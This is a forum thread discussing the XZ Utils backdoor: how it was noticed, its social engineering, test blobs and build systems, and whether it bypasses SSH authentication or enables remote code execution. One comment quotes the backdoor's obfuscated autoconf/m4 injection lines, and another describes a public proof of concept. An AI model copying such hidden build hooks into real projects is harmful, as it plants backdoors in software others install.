XZ backdoor in a nutshell

[ - ]

Aatube@kbin.melroy.org

237 points

8 months ago

Don’t forget all of this was discovered because ssh was running 0.5 seconds slower

permalink

report

reply

[ - ]

Steamymoomilk@sh.itjust.works

91 points

8 months ago

Its toooo much bloat. There must be malware XD linux users at there peak!

permalink

report

parent

reply

[ - ]

rho50@lemmy.nz

96 points

8 months ago

*

Tbf 500ms latency on - IIRC - a loopback network connection in a test environment is a lot. It’s not hugely surprising that a curious engineer dug into that.

permalink

report

parent

reply

[ - ]

ryannathans@aussie.zone

40 points

8 months ago

Especially that it only took 300ms before and 800ms after

permalink

report

parent

reply

[ - ]

Jolteon@lemmy.zip

80 points

8 months ago

Half a second is a really, really long time.

permalink

report

parent

reply

[ - ]

lurch (he/him)@sh.itjust.works

26 points

8 months ago

reminds of Data after the Borg Queen incident

permalink

report

parent

reply

[ - ]

Olgratin_Magmatoe@lemmy.world

2 points

8 months ago

Which ep/movie are you referring to?

permalink

report

parent

reply

Show more comments

[ - ]

Olgratin_Magmatoe@lemmy.world

6 points

8 months ago

If this exploit was more performant, I wonder how much longer it would have taken to get noticed.

permalink

report

parent

reply

[ - ]

imsodin@infosec.pub

52 points

8 months ago

Technically that wasn’t the initial entrypoint, paraphrasing from https://mastodon.social/@AndresFreundTec/112180406142695845 :

It started with ssh using unreasonably much cpu which interfered with benchmarks. Then profiling showed that cpu time being spent in lzma, without being attributable to anything. And he remembered earlier valgrind issues. These valgrind issues only came up because he set some build flag he doesn’t even remember anymore why it is set. On top he ran all of this on debian unstable to catch (unrelated) issues early. Any of these factors missing, he wouldn’t have caught it. All of this is so nuts.

permalink

report

parent

reply

[ - ]

Possibly linux@lemmy.zipOP

48 points

8 months ago

Postgres sort of saved the day

permalink

report

parent

reply

[ - ]

Hupf@feddit.de

20 points

8 months ago

RIP Simon Riggs

permalink

report

parent

reply

[ - ]

acockworkorange@mander.xyz

6 points

8 months ago

https://www.postgresql.org/about/news/remembering-simon-riggs-2830/

permalink

report

parent

reply

[ - ]

oce 🐆@jlai.lu

34 points

8 months ago

Is that from the Microsoft engineer or did he start from this observation?

permalink

report

parent

reply

[ - ]

whereisk@lemmy.world

45 points

8 months ago

From what I read it was this observation that led him to investigate the cause. But this is the first time I read that he’s employed by Microsoft.

permalink

report

parent

reply

[ - ]

The Quuuuuill@slrpnk.net

15 points

8 months ago

I’ve seen that claim a couple of places and would like a source. It very well may be since Microsoft prefers Debian based systems for WSL and for azure, but its not something I would have assumed by default

permalink

report

parent

reply

Show more comments

[ - ]

merthyr1831@lemmy.world

124 points

8 months ago

I know this is being treated as a social engineering attack, but having unreadable binary blobs as part of your build/dev pipeline is fucking insane.

permalink

report

reply

[ - ]

suy@programming.dev

39 points

8 months ago

Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library?

The scary thing is that there is people still using autotools, or any other hyper-complicated build system in which this is easy to hide because who the hell cares about learning about Makefiles, autoconf, automake, M4 and shell scripting at once to compile a few C files. I think hiding this in any other build system would have been definitely harder. Check this mess:

  dnl Define somedir_c_make.
  [$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
  dnl Use the substituted somedir variable, when possible, so that the user
  dnl may adjust somedir a posteriori when there are no special characters.
  if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
    [$1]_c_make='\"$([$1])\"'
  fi
  if test "x$gl_am_configmake" != "x"; then
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
  else
    gl_[$1]_config=''
  fi

permalink

report

parent

reply

[ - ]

nxdefiant@startrek.website

25 points

8 months ago

*

It’s not uncommon to keep example bad data around for regression to run against, and I imagine that’s not the only example in a compression library, but I’d definitely consider that a level of testing above unittests, and would not include it in the main repo. Tests that verify behavior at run time, either when interacting with the user, integrating with other software or services, or after being packaged, belong elsewhere. In summary, this is lazy.

permalink

report

parent

reply

[ - ]

inetknght@lemmy.ml

17 points

8 months ago

and would not include it in the main repo

Tests that verify behavior at run time belong elsewhere

The test blobs belong in whatever repository they’re used.

It’s comically dumb to think that a repository won’t include tests. So binary blobs like this absolutely do belong in the repository.

permalink

report

parent

reply

[ - ]

nxdefiant@startrek.website

3 points

8 months ago

*

A repo dedicated to non-unit-test tests would be the best way to go. No need to pollute your main code repo with orders of magnitude more code and junk than the actual application.

That said, from what I understand of the exploit, it could have been avoided by having packaging and testing run in different environments (I could be wrong here, I’ve only given the explanation a cursory look). The tests modified the code that got released. Tests rightly shouldn’t be constrained by other demands (like specific versions of libraries that may be shared between the test and build steps, for example), and the deploy/build step shouldn’t have to work around whatever side effects the tests might create. Containers are easy to spin up.

Keeping them separate helps. Sure, you could do folders on the same repo, but test repos are usually huge compared to code repos (in my experience) and it’s nicer to work with a repo that keeps its focus tight.

It’s comically dumb to assume all tests are equal and should absolutely live in the same repo as the code they test, when writing tests that function multiple codebases is trivial, necessary, and ubiquitous.

report

reply

[ - ]

2 points

8 months ago

I agree that in most cases it’s more of an E2E or integratiuon test, not sure of the need to split into different repo, and well in the end I’m not sure that would have made any big protection anyhow.

permalink

report

parent

reply

[ - ]

xlash123@sh.itjust.works

24 points

8 months ago

As mentioned, binary test files makes sense for this utility. In the future though, there should be expected to demonstrate how and why the binary files were constructed in this way, kinda like how encryption algorithms explain how they derived any arbitrary or magic numbers. This would bring more trust and transparency to these files without having to eliminate them.

permalink

report

parent

reply

[ - ]

noli@programming.dev

1 point

8 months ago

You mean that instead of having a binary blob you have a generator for the data?

permalink

report

parent

reply

[ - ]

ipkpjersi@lemmy.ml

2 points

8 months ago

Yep, I consider it a failure of the build/dev pipeline.

permalink

report

parent

reply

[ - ]

gregorum@lemm.ee

119 points

8 months ago

Thank you open source for the transparency.

permalink

report

reply

[ - ]

Cornelius_Wangenheim@lemmy.world

69 points

8 months ago

And thank you Microsoft.

permalink

report

parent

reply

[ - ]

just_another_person@lemmy.world

65 points

8 months ago

Shocking, but true.

permalink

report

parent

reply

[ - ]

Pantherina@feddit.de

14 points

8 months ago

They just pay some dude that is doing good work

permalink

report

parent

reply

[ - ]

d3Xt3r@lemmy.nzM

99 points

8 months ago

This is informative, but unfortunately it doesn’t explain how the actual payload works - how does it compromise SSH exactly?

permalink

report

reply

[ - ]

Aatube@kbin.melroy.org

47 points

8 months ago

It allows a patched SSH client to bypass SSH authentication and gain access to a compromised computer

permalink

report

parent

reply

[ - ]

d3Xt3r@lemmy.nzM

66 points

8 months ago

*

From what I’ve heard so far, it’s NOT an authentication bypass, but a gated remote code execution.

There’s some discussion on that here: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

But it would be nice to have a similar digram like OP’s to understand how exactly it does the RCE and implements the SSH backdoor. If we understand how, maybe we can take measures to prevent similar exploits in the future.

permalink

report

parent

reply

[ - ]

underisk@lemmy.ml

27 points

8 months ago

I think ideas about prevention should be more concerned with the social engineering aspect of this attack. The code itself is certainly cleverly hidden, but any bad actor who gains the kind of access as Jia did could likely pull off something similar without duplicating their specific method or technique.

permalink

report

parent

reply

Show more comments

[ - ]

The Doctor@beehaw.org

8 points

8 months ago

Somebody wrote a PoC for it: https://github.com/amlweems/xzbot#backdoor-demo

Basically, if you have a patched SSH client with the right ED448 key you can have the gigged sshd on the other side run whatever commands you want. The demo just does id > /tmp/.xz but it could be whatever command you want.

permalink

report

parent

reply

[ - ]

baseless_discourse@mander.xyz

6 points

8 months ago

*

I am not a security expert, but the scenario they describe sounds exactly like authentication bypass to a layman like me.

According to https://www.youtube.com/watch?v=jqjtNDtbDNI the software installs a malicious library that overwrite the signature verification function of ssh.

I was wondering if the bypass function was designed to be slightly less resource intensive, it probably won’t be discovered and will be shipped to production.

Also I have mixed feeling about dynamic linking, on the one hand, it allows projects like harden malloc to easily integrate into the system, on the other hand, it also enables the attacker to hijack the library in a similar fashion.

EDIT: This is a remote code execution exploit, not authentication bypass. The payload is sent as an authentication message and will be executed by the compromised authentication function.

This means:

the payload will be executed as root, since sshd run as root.
the payload will leave no trace in login log.

So this is much worse than ssh authentication bypass.

permalink

report

parent

reply

Show more comments

[ - ]

Aatube@kbin.melroy.org

3 points

8 months ago

*

Under the right circumstances this interference could potentially enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely. —Wikipedia, sourced to RedHat

Of course, the authentication bypass allows remote code execution.

permalink

report

parent

reply

[ - ]

uis@lemm.ee

4 points

8 months ago

There is RedHat’s patch for OpenSSH that adds something for systemd, which adds libsystemd as dependency, which has liblzma as its own dependency.

permalink

report

parent

reply

[ - ]

Possibly linux@lemmy.zipOP

-6 points

8 months ago

*

I do believe it does

permalink

report

parent

reply

[ - ]

UnityDevice@startrek.website

97 points

8 months ago

If this was done by multiple people, I’m sure the person that designed this delivery mechanism is really annoyed with the person that made the sloppy payload, since that made it all get detected right away.

permalink

report

reply

[ - ]

fluxion@lemmy.world

33 points

8 months ago

I hope they are all extremely annoyed and frustrated

permalink

report

parent

reply

[ - ]

acockworkorange@mander.xyz

24 points

8 months ago

Inconvenienced, even.

permalink

report

parent

reply

[ - ]

Hupf@feddit.de

6 points

8 months ago

Inconceivable!

report

reply

[ - ]

21 points

8 months ago

I like to imagine this was thought up by some ambitious product manager who enthusiastically pitched this idea during their first week on the job.

Then they carefully and meticulously implemented their plan over 3 years, always promising the executives it would be a huge pay off. Then the product manager saw the writing on the wall that this project was gonna fail. Then they bailed while they could and got a better position at a different company.

The new product manager overseeing this project didn’t care about it at all. New PM said fuck it and shipped the exploit before it was ready so the team could focus their work on a new project that would make new PM look good.

The new project will be ready in just 6-12 months, and it is totally going to disrupt the industry!

permalink

report

parent

reply

[ - ]

nxdefiant@startrek.website

26 points

8 months ago

*

I see a dark room of shady, hoody-wearing, code-projected-on-their-faces, typing-on-two-keyboards-at-once 90’s movie style hackers. The tables are littered with empty energy drink cans and empty pill bottles.

A man walks in. Smoking a thin cigarette, covered in tattoos and dressed in the flashiest interpretation of “Yakuza Gangster” imaginable, he grunts with disgust and mutters something in Japanese as he throws the cigarette to the floor, grinding it into the carpet with his thousand dollar shoes.

Flipping on the lights with an angry flourish, he yells at the room to gather for standup.

permalink

report

parent

reply

[ - ]

MonkeMischief@lemmy.today

12 points

8 months ago

*

Cigarette is stomped.

Stickies fall from kanban board.